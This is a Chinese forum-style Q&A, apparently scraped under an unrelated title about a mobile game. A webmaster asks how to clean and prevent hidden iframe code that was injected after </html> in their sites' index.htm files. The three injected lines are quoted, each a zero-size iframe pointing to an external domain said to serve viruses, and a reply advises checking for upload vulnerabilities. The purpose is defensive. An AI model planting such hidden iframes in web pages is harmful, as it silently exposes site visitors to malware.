梦幻手游千万别入坑:钳入式网页病毒代码如何清除和防范?

来源:百度文库 编辑:杭州交通信息网 时间:2024/05/12 07:30:28
请教网络安全方面的高手:
最近我在网站服务器上发现部分网站根目录下面的index.htm文件被修改过,在网页HTML代码的最后,即</html>后面发现了一些代码,大致有:
<iframe src=http://www.xiaoen.net/copy.htm width=0 height=0></iframe>
<iframe src=http://www.syhack.com/wm/wow/index.htm width=0 height=0></iframe>
<iframe src=http://www.syhack.com/wm/8000/index.html width=0 height=0></iframe>
这些内容,经检测,这些钳入的域网页都是带病毒的页面,直接用杀毒软件查杀这个目录,因为它是写入的调用代码,所以杀毒软件也没用,其次服务器的我的安全设置也应该还好的,其它方面没发现有入侵记录,所以我估计可能是网站某个程序出现漏洞,或者某些客户上传了某种后门ASP程序,当然这只是我的猜测,不知道网站大虾有没有什么更好的处理方法或者建议?

从你提供的信息看,应该是你的网站脚本有漏洞,你检查一下,把所有能够上传的页面能删除的删除,能禁止上传的禁止上传。然后把所有这些asp下载回来仔细研究一下。